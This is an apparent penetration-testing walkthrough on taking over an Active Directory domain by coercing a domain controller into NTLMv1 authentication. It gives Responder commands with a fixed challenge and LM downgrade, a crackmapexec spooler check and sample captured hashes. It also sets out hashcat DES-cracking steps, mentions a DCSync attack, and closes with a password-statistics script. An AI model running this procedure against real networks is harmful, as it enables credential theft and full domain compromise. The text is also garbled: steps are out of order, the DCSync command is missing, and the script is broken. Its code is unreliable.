From DFSCoercer to DA
For the attack to be successful, there are (4) requirements:
- 1.Any valid domain account credentials
- 2.Network connectivity to the target SMB (Server Message Block) Service.
- 3.The target host must be running the Print Spooler service
- 4.The target host must be allowed to send NTLMv1 responses (cannot be set to enforce NTLMv2 responses)
To determine if NTLM responses can be sent, I will check secpol.msc at Security Settings\Local Policies\Security Options\Network security: LANManager authentication level. Vulnerable settings can be any of the following:
- Send LM& NTLM responses
- Send LM& NTLM – use NTLMv2 session security if negotiated
- SendNTLM responses only.
First, ensure that Responder’s challenge is set to 1122334455667788 in Responder.conf:
sudo python3 /usr/share/responder/Responder.py -I eth0 -w --disable-ess --lm
--disabled-ess and --lm
This is because the captured hash is NTLMv1 with SSP(Security Support Provider), which changes the server challenge and is not quite ideal for the attack. We can use Responder’s LanMan downgrade flag to get a NTLMv1 hash without SSP.
Before starting, we can use crackmapexec to test if the spooler service in enabled.
crackmapexec smb -u "" -p "" target_ip -M spooler
Now that the DC’s NTLMv1 hash has been captured, it can be cracked back into a plain NTLM hash, compatible with pass-the-hash attacks.This can be done quickly by submitting NTHASH:<response>to crack.sh, which uses rainbow tables, or by manually reconstructing the NTLM hash from its DES elements using hashcat and EvilMog’s ntlmv1-multi tool (my hashcat rig with an NVIDIA 3090 takes around 16 days to brute-force the needed DES hashes).
python3 ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"
['hashcat', '', 'DUSTIN-5AA37877', '85D5BC2CE95161CD00000000000000000000000000000000', '892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0', '1122334455667788']
LM Response: 85D5BC2CE95161CD00000000000000000000000000000000
NT Response: 892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Client Challenge: 1122334455667788
SRV Challenge: b36d2b9a8607ea77
To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000
To crack with hashcat create a file with the following contents:
To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
To Crack with crack.sh use the following token
- 1.Use this charset:
2. Create a file with the following content from step5:
892F905962F76D32:b36d2b9a8607ea77 >> 14000.hash
3837F613F88DE27C:b36d2b9a8607ea77 >> 14000.hash
3. Execute hashcat
.\hashcat.exe -m 14000 -a 3 -1 .\charsets\DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1
After obtaining the cracked NTLM hash, we need to find out the target user. We can dump the domain users with ldapdump or bloodhound before. When a domain admin account is picked up, we just need to execute the following command (DSync attack):
The NTLM account of the domain admin can be obtained.
python3 script_passwords.py hashes.txt cracked.txt
file_hashes = sys.argv
file_cracked = sys.argv
with open(file_hashes) as f:
hashes = [line.rstrip() for line in f]
with open(file_cracked) as f:
cracked = [line.rstrip() for line in f]
f = open("output.txt", "w")
for hash in hashes:
for crack in cracked:
if a in hash:
The ouput.txt file is generated with all the NTLM hashes, including repetitions.
Finally, the top of passwords can be see:
cat output.txt | sort | uniq -c | sort -nr